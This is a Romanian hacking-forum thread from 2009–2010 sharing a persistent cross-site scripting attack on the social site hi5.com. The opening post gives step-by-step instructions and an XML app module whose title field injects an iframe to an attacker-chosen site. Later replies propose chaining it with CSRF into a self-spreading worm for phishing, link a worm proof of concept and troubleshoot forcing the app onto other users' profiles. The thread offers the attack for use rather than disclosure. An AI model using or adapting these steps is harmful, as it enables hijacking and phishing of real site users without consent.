Guest Nemessis Posted December 30, 2009 Report Share Posted December 30, 2009 Un xss permanent in hi5.comNOTA: afecteaza doar userii logatiDEMO: hi5 | Your Friends. Your World. (trebuie sa fiti logati pe hi5.com)1. Creeati un cont. 2. Puneti niste poze.3. Accesati hi5 | Your Friends. Your World. si dati click pe sign up4. Bifati toate casutele la language5. Type - personal / Purpose - blablabla Acum sunteti redirectionati catre hi5 | Your Friends. Your World.6. Click "Create your first App"7. Click "Create Sample App"8. Click "Sample App"9. O sa apara o eroare. Copiati user id din address bar. Linkul respectiv arata cam asa: http://betasandbox.hi5.com/friend/apps/entry/www.betasandbox.hi5.com/friend/apps/developer/app/get/xml/43772?view=devCanvas&from=devhome&In cazul de fata user id este 43772. 10. Acum introduceti user id-ul vostru in urmatorul link (inlocuiti USERIDHERE cu user id-ul vostru):http://hi5.com/friend/apps/developer/app/refresh.do?appId=USERIDHERE#/friend/apps/ajax/displayEditApp.do?appId=USERIDHERE11. Click "Back to Dev Canvas View". Cand vedeti urmatoarele apasati edit dupa care apasati save.12. Click Add to my profile13. Acum schimbati textul <?xml version="1.0" encoding="UTF-8"?><Module><ModulePrefs title="[COLOR="Cyan"]Sample App[/COLOR]" author_email="[COLOR="Red"]pulea@binkmail.com[/COLOR]" /><Content type="html"><![CDATA[Hello, world!]]></Content></Module>cu urmatorul. <?xml version="1.0" encoding="UTF-8"?><Module><ModulePrefs title="[COLOR="Cyan"]<iframe src=http://epicfail.ro>[/COLOR]" author_email="[COLOR="Red"]pulea@binkmail.com[/COLOR]" /><Content type="html"><![CDATA[Hello, world!]]></Content></Module>Nu uitati sa schimbati epicfail cu linkul vostru si sa schimbati pulea@binkmail.com cu adresa de mail pe care ati folosit-o la crearea contului de hi5.Have fun baieti. Quote Link to comment Share on other sites More sharing options...
SympleBoy22 Posted December 30, 2009 Report Share Posted December 30, 2009 o.O.As incerca eu dar cine naiba e pe hai faiv la ora asta.Incerc maine.Oricum buna treaba. Quote Link to comment Share on other sites More sharing options...
hozarares Posted December 30, 2009 Report Share Posted December 30, 2009 pai nu`i nime`...is toti pe RST Quote Link to comment Share on other sites More sharing options...
Cheater Posted December 30, 2009 Report Share Posted December 30, 2009 Interesant, iar pentru maniaci de yahoo, la iframe un redirect la gruber, si in about me de la profil prin csrf injectia aplicatiei in profilul celui care iti vizioneaza profilul tau, apoi o tara de masuri, commenturi la profile f vizionate cu acelasi csrf si se va raspandi frumos prin hi5 jucaria.Have fun!PS: Conform SATI, ~58% din traficul facut in romania pe web este pe hi5.com!!! so in cazul de fata, doar imaginatia e limita. Quote Link to comment Share on other sites More sharing options...
Fitty Posted December 30, 2009 Report Share Posted December 30, 2009 Hai sa cautam in Google Waves Paxi!!! Quote Link to comment Share on other sites More sharing options...
edededi Posted December 30, 2009 Report Share Posted December 30, 2009 felicitari rst ! Asta era xss-ul despre care se vorbea pe hackesblog ? Quote Link to comment Share on other sites More sharing options...
Guest Nemessis Posted December 30, 2009 Report Share Posted December 30, 2009 Unul din ele. Faza e ca odata cu schimbarile hi5 au disparut cu totul unele chestii. Developerul de-abia acum a revenit dupa vreo luna si ceva in care a fost sters de pe servere. Quote Link to comment Share on other sites More sharing options...
edededi Posted December 30, 2009 Report Share Posted December 30, 2009 am inteles , felicitari inca odata .La mai multe ! Quote Link to comment Share on other sites More sharing options...
Moderators Dragos Posted January 2, 2010 Moderators Report Share Posted January 2, 2010 @Nemessis : Daca tu creezi aplicatia si o pui pe profilul tau, doar tu o poti vizualiza. Daca vrei ca si ceilalti sa o vizualizeze, trebuie sa fie aprobata de staff-ul hi5.Recomand linkul urmator : http://www.hi5.com/friend/apps/displayAppCanvas.do?appId=USERID Quote Link to comment Share on other sites More sharing options...
Guest Nemessis Posted January 3, 2010 Report Share Posted January 3, 2010 O pot vizualiza si altii atata timp cat sunt logati si ii poti forta sa o adauge si in profilele lor. Quote Link to comment Share on other sites More sharing options...
Guest Nemessis Posted January 4, 2010 Report Share Posted January 4, 2010 Proof of concept: worm hi5 http://rstcenter.com/forum/19030-hi5-worm-noobs-stealth-method.rst Quote Link to comment Share on other sites More sharing options...
trxtxx Posted January 4, 2010 Report Share Posted January 4, 2010 (edited) Proof of concept: worm hi5 http://rstcenter.com/forum/19030-hi5-worm-noobs-stealth-method.rstda mie nu mi-a mers, imi tot dadea o eroare ca lu church am reusit am encodat linkul nu a mai dat nici o eroare dar am incercat de pe alte conturi si nu mi le-a instalat si pe conturile alea.ce gresesc? sau mai bine zis le instaleaza automat si lor ? sau trebuie sa dea click sa le instaleze aplicatia si loredit: ERROR!The application is not approved yet. Unable to add.asta mi-a dat cand am dat click direct pe linkul din live headers care seamana cu al tauhttp://hi5.com/friend/apps/addApp.do?referrer=&privacy=1&privacy=2&privacy=3&privacy=4&privacy=5&appId=44156&appContext=1 Edited January 4, 2010 by trxtxx Quote Link to comment Share on other sites More sharing options...
Guest Nemessis Posted January 4, 2010 Report Share Posted January 4, 2010 Nu ai respectat pasii. Te-ai grabit. Vezi aici explicatia http://rstcenter.com/forum/19030-hi5-worm-noobs-stealth-method.rst#post122168 Quote Link to comment Share on other sites More sharing options...
trxtxx Posted January 4, 2010 Report Share Posted January 4, 2010 stai ca mi-a mers:) a aparut acum sa ma descurc sa o adaug fortat si pe contul care o vede Quote Link to comment Share on other sites More sharing options...
trxtxx Posted January 4, 2010 Report Share Posted January 4, 2010 (edited) mi-a mers si mie multumesc Edited January 4, 2010 by trxtxx Quote Link to comment Share on other sites More sharing options...
